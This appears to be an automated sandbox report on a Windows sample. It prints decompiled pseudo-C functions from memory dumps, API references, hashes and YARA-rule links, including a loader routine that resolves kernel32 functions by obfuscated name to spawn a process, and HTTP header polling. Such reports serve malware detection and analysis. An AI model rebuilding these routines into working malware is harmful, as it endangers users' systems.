Part of subcall function 07F77B3B: memset.NTDLL ref: 07F77B7D

wcstombs.NTDLL ref: 07F756B6

Part of subcall function 07F7137B: SysAllocString.OLEAUT32(?), ref: 07F713B6

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

HeapFree.KERNEL32(00000000,?,?), ref: 07F756F7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 07F75703
HeapFree.KERNEL32(00000000,?,?,08A295B0), ref: 07F7570F
HeapFree.KERNEL32(00000000,?), ref: 07F7571B
HeapFree.KERNEL32(00000000,?), ref: 07F75727

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3748877296-0
Opcode ID: 5ad714be6703467105b531bc524e4f485cc874fa6a075a9c036e9292a2164961
Instruction ID: fdcbd8c44e813269d9b53ff8b710ac32233841edbe0acb563dfde5737805be93
Opcode Fuzzy Hash: 5ad714be6703467105b531bc524e4f485cc874fa6a075a9c036e9292a2164961
Instruction Fuzzy Hash: DC913AB1A00109EFCB11EFB8DC89A9E7BB9EF48315F584066F404D7260DB35D952DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EB4339D, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6EB433E1

Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E09
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E1B
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E2D
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E3F
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E51
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E63
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E75
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E87
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44E99
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44EAB
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44EBD
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44ECF
Part of subcall function 6EB44DEC: _free.LIBCMT ref: 6EB44EE1

_free.LIBCMT ref: 6EB433D6

Part of subcall function 6EB35039: RtlFreeHeap.NTDLL(00000000,00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB3504F
Part of subcall function 6EB35039: GetLastError.KERNEL32(00000000,?,6EB25750,?,00000000,?,6EB1747E,00000000,00000011,00000001), ref: 6EB35061

_free.LIBCMT ref: 6EB433F8
_free.LIBCMT ref: 6EB4340D
_free.LIBCMT ref: 6EB43418
_free.LIBCMT ref: 6EB4343A
_free.LIBCMT ref: 6EB4344D
_free.LIBCMT ref: 6EB4345B
_free.LIBCMT ref: 6EB43466
_free.LIBCMT ref: 6EB4349E
_free.LIBCMT ref: 6EB434A5
_free.LIBCMT ref: 6EB434C2
_free.LIBCMT ref: 6EB434DA

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: cc83c7fcae4b3d2afd159494c9473739c3b4ff75481a2a254ba1a0f090270212
Instruction ID: 145480b267765a333b5e5c43f58e781e647b6820ec19e49c10b4b4217062aaca
Opcode Fuzzy Hash: cc83c7fcae4b3d2afd159494c9473739c3b4ff75481a2a254ba1a0f090270212
Instruction Fuzzy Hash: EE31BF31610796DFEB619EB9D849BCA7BF8EF00350F244829E095C71A4CF31E8809768

Uniqueness

Uniqueness Score: -1.00%

Function 07F7AC95, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209
libraryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E07F7AC95(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x7f70000;
				_t115 = _t139[3] + 0x7f70000;
				_t131 = _t139[4] + 0x7f70000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x7f70000;
				_v16 = _t139[5] + 0x7f70000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x7f70002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x7f7d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x7f7d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x7f7d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x7f7d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x7f7d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x7f7d198; // 0x0
										 *_t102 = _t125;
										 *0x7f7d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x7f7d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x07f7aca4
0x07f7acba
0x07f7acc0
0x07f7acc2
0x07f7acc7
0x07f7accd
0x07f7acd2
0x07f7acd5
0x07f7ace3
0x07f7acea
0x07f7aced
0x07f7acf0
0x07f7acf1
0x07f7acf4
0x07f7acf7
0x07f7acfa
0x07f7acff
0x07f7ad0e
0x00000000
0x07f7ad14
0x07f7ad1e
0x07f7ad28
0x07f7ad2d
0x07f7ad2f
0x07f7ad39
0x07f7ad3c
0x07f7ad3f
0x07f7ad45
0x07f7ad47
0x07f7ad47
0x07f7ad4a
0x07f7ad4d
0x07f7ad52
0x07f7ad56
0x07f7ad69
0x07f7ad6b
0x07f7ae13
0x07f7ae13
0x07f7ae1a
0x07f7ae1d
0x07f7ae27
0x07f7ae27
0x07f7ae2b
0x07f7aea9
0x07f7aeac
0x07f7aeae
0x07f7aeae
0x07f7aeb5
0x07f7aeb7
0x07f7aec1
0x07f7aec4
0x07f7aec7
0x07f7aec7
0x00000000
0x07f7ae2d
0x07f7ae30
0x07f7ae5e
0x07f7ae68
0x07f7ae6c
0x07f7ae74
0x07f7ae77
0x07f7ae7e
0x07f7ae88
0x07f7ae88
0x07f7ae8c
0x07f7ae91
0x07f7aea0
0x07f7aea6
0x07f7aea6
0x07f7ae8c
0x00000000
0x07f7ae37
0x07f7ae3a
0x07f7ae42
0x07f7ae57
0x07f7ae5c
0x00000000
0x00000000
0x07f7ae5c
0x00000000
0x07f7ae42
0x07f7ae30
0x07f7ae2b
0x07f7ad71
0x07f7ad78
0x07f7ad88
0x07f7ad91
0x07f7ad95
0x07f7add8
0x07f7ade4
0x07f7ae0d
0x07f7ade6
0x07f7adea
0x07f7adf0
0x07f7adf8
0x07f7adfa
0x07f7adfd
0x07f7ae03
0x07f7ae05
0x07f7ae05
0x07f7adf8
0x07f7adea
0x00000000
0x07f7ade4
0x07f7ad9d
0x07f7ada0
0x07f7ada7
0x07f7adb7
0x07f7adba
0x07f7adca
0x00000000
0x07f7add0
0x07f7adb1
0x07f7adb5
0x00000000
0x00000000
0x00000000
0x07f7adb5
0x07f7ad82
0x07f7ad86
0x00000000
0x00000000
0x00000000
0x07f7ad86
0x07f7ad5f
0x07f7ad63
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 07F7AD0E
LoadLibraryA.KERNEL32(?), ref: 07F7AD8B
GetLastError.KERNEL32 ref: 07F7AD97
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 07F7ADCA

Strings

$, xrefs: 07F7ACE3

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 36895a681a91903a9eabfe7f0ec43b4fda70c4bc1de23d71d9c262ad44e4a030
Instruction ID: d9446471598f36ea53315ea57cbe6280486bc1334f2f27204d5f3e6cf3b35d1b
Opcode Fuzzy Hash: 36895a681a91903a9eabfe7f0ec43b4fda70c4bc1de23d71d9c262ad44e4a030
Instruction Fuzzy Hash: 81815FB1A0020AAFDB25CFA9D881BAEB7F5FF48315F15802AE505E7340E774E945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07F78F85, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E07F78F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x7f7d33c; // 0x8a29c30
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E07F79B1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x7f7c18c;
				}
				_t46 = E07F77F8B(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E07F71525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x7f7d2a8; // 0xaaa5a8
						_t16 = _t75 + 0x7f7eb08; // 0x530025
						 *0x7f7d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E07F79B1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x7f7c190;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E07F71525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E07F78B22(_v20);
						} else {
							_t66 =  *0x7f7d2a8; // 0xaaa5a8
							_t31 = _t66 + 0x7f7ec28; // 0x73006d
							 *0x7f7d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E07F78B22(_v12);
				}
				return _v24;
			}

0x07f78f8d
0x07f78f93
0x07f78f9a
0x07f78fa0
0x07f78fa4
0x07f78fa8
0x07f78fab
0x07f78fb0
0x07f78fb5
0x07f78fb7
0x07f78fb7
0x07f78fc0
0x07f78fc5
0x07f78fca
0x07f78fd0
0x07f78fda
0x07f78fe3
0x07f78fea
0x07f79003
0x07f79008
0x07f7900d
0x07f79016
0x07f7901f
0x07f79030
0x07f79039
0x07f7903d
0x07f79041
0x07f79046
0x07f7904b
0x07f7904d
0x07f7904d
0x07f79057
0x07f79060
0x07f79067
0x07f7907f
0x07f79083
0x07f790c0
0x07f79085
0x07f79088
0x07f79090
0x07f790a1
0x07f790ad
0x07f790b5
0x07f790b9
0x07f790b9
0x07f79083
0x07f790c8
0x07f790cd
0x07f790d4

APIs

GetTickCount.KERNEL32 ref: 07F78F9A
lstrlen.KERNEL32(?,80000002,00000005), ref: 07F78FDA
lstrlen.KERNEL32(00000000), ref: 07F78FE3
lstrlen.KERNEL32(00000000), ref: 07F78FEA
lstrlenW.KERNEL32(80000002), ref: 07F78FF7
lstrlen.KERNEL32(?,00000004), ref: 07F79057
lstrlen.KERNEL32(?), ref: 07F79060
lstrlen.KERNEL32(?), ref: 07F79067
lstrlenW.KERNEL32(?), ref: 07F7906E

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: a5941b11a29e60397f524d28a057652ea31e7476e1fb629b3f586e4f442a9ef0
Instruction ID: dead657aff57ead62e6c13c73863acb7b365052b49fbcfc7ba46df034dcec905
Opcode Fuzzy Hash: a5941b11a29e60397f524d28a057652ea31e7476e1fb629b3f586e4f442a9ef0
Instruction Fuzzy Hash: 48416AB2D00219FBCF11AFA8DC49DDEBBB9EF44358F094056E904A7210DB75DA11EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EB172D0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6EB17307
___except_validate_context_record.LIBVCRUNTIME ref: 6EB1730F
_ValidateLocalCookies.LIBCMT ref: 6EB17398
__IsNonwritableInCurrentImage.LIBCMT ref: 6EB173C3
_ValidateLocalCookies.LIBCMT ref: 6EB17418

Strings

csm, xrefs: 6EB173AD

Memory Dump Source

Source File: 00000009.00000002.524101586.000000006E941000.00000020.00020000.sdmp, Offset: 6E940000, based on PE: true

Associated: 00000009.00000002.524086443.000000006E940000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524473381.000000006EC22000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.524580245.000000006ED02000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524594907.000000006ED04000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524620642.000000006ED08000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524634112.000000006ED0A000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524650708.000000006ED0B000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524668275.000000006ED0C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524678109.000000006ED0D000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.524695130.000000006ED17000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524708028.000000006ED1C000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.524726259.000000006ED21000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: e38ef6f71658ef1d1b88ab0af91f5a9a9faaeb48e6bc8a36b6efdc201447e4f3
Instruction ID: a71260e8a06f54b9e3f77dce14a771554a7bb2658fc915c611eafd8513355da9
Opcode Fuzzy Hash: e38ef6f71658ef1d1b88ab0af91f5a9a9faaeb48e6bc8a36b6efdc201447e4f3
Instruction Fuzzy Hash: 1C51B9349142A99FCF00CFA8D890ADEBFB9EF46338F148155EC145B391D771AA16CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07F73485, Relevance: 10.6, APIs: 7, Instructions: 109
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E07F73485(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E07F74944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E07F7A789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x7f7d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x7f7d2a8; // 0xaaa5a8
					_t18 = _t47 + 0x7f7e3e6; // 0x73797325
					_t68 = E07F77912(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x7f7d2a8; // 0xaaa5a8
						_t19 = _t50 + 0x7f7e747; // 0x8a28cef
						_t20 = _t50 + 0x7f7e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E07F73179();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E07F73179();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x7f7d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E07F78B22(_t70);
				goto L12;
			}

0x07f7348d
0x07f7348d
0x07f7349c
0x07f734a3
0x07f734a8
0x07f735b5
0x07f735bc
0x07f735bc
0x07f734b7
0x07f734bf
0x07f734c2
0x07f734c7
0x07f734dc
0x07f734e2
0x07f734e3
0x07f734e6
0x07f734ec
0x07f734ef
0x07f734f4
0x07f734fc
0x07f73508
0x07f7350c
0x07f7359c
0x07f73512
0x07f73512
0x07f73517
0x07f7351e
0x07f73532
0x07f73536
0x07f73585
0x07f73538
0x07f73539
0x07f73540
0x07f73559
0x07f7355b
0x07f7355f
0x07f73566
0x07f73580
0x07f73568
0x07f73571
0x07f73576
0x07f73576
0x07f73566
0x07f73594
0x07f73594
0x07f7350c
0x07f735a3
0x07f735ac
0x07f735b0
0x00000000

APIs

Part of subcall function 07F74944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,07F734A1,?,00000001,?,?,00000000,00000000), ref: 07F74969
Part of subcall function 07F74944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 07F7498B
Part of subcall function 07F74944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 07F749A1
Part of subcall function 07F74944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 07F749B7
Part of subcall function 07F74944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 07F749CD
Part of subcall function 07F74944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 07F749E3

memset.NTDLL ref: 07F734EF

Part of subcall function 07F77912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,07F73508,73797325), ref: 07F77923
Part of subcall function 07F77912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 07F7793D

GetModuleHandleA.KERNEL32(4E52454B,08A28CEF,73797325), ref: 07F73525
GetProcAddress.KERNEL32(00000000), ref: 07F7352C
HeapFree.KERNEL32(00000000,00000000), ref: 07F73594

Part of subcall function 07F73179: GetProcAddress.KERNEL32(36776F57,07F78BDC), ref: 07F73194

CloseHandle.KERNEL32(00000000,00000001), ref: 07F73571
CloseHandle.KERNEL32(?), ref: 07F73576
GetLastError.KERNEL32(00000001), ref: 07F7357A

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: ba22ea13c6ca35661ca006d6f19caceb34b1b3c5175eb990ca024fef78f5f52f
Instruction ID: ad9856c4099b205f1066d1b4f9c69c374f6656ec5f0c67eadf25cff3a3e053f7
Opcode Fuzzy Hash: ba22ea13c6ca35661ca006d6f19caceb34b1b3c5175eb990ca024fef78f5f52f
Instruction Fuzzy Hash: CC312EF2D00209FFDB10AFA4DC89D9EBFBCEF08354F04456AE545A7210D634AA45DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07F757DD, Relevance: 10.6, APIs: 7, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E07F757DD(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E07F71525(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E07F78B22(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E07F729C0( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x07f757dd
0x07f757dd
0x07f757ed
0x07f757f0
0x07f757f4
0x07f757fa
0x07f757ff
0x07f75818
0x07f7582c
0x07f75833
0x07f7583a
0x07f7588d
0x07f75893
0x07f75899
0x07f758d4
0x07f758da
0x00000000
0x00000000
0x00000000
0x07f75899
0x07f75840
0x00000000
0x07f75847
0x07f75855
0x07f75858
0x07f7585b
0x07f75867
0x07f7586b
0x07f758cd
0x07f7586d
0x07f7587f
0x07f758bd
0x07f758c8
0x07f75881
0x07f75884
0x07f75888
0x07f75888
0x07f7587f
0x00000000
0x07f7586b
0x07f75840
0x07f75804
0x07f7580a
0x07f7580d
0x07f75812
0x00000000
0x00000000
0x00000000
0x07f758a2
0x07f758aa
0x07f758af
0x07f758b2
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 07F757F4
SetEvent.KERNEL32(?), ref: 07F75804
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 07F75836
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 07F7585B
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 07F7587B
GetLastError.KERNEL32 ref: 07F7588D

Part of subcall function 07F729C0: WaitForMultipleObjects.KERNEL32(00000002,07F7A923,00000000,07F7A923,?,?,?,07F7A923,0000EA60), ref: 07F729DB

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

GetLastError.KERNEL32(00000000), ref: 07F758C2

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 3369646462-0
Opcode ID: e667b524b862e3a94adad135c276f1c21d6632468abe252edd2be96f9d2a2025
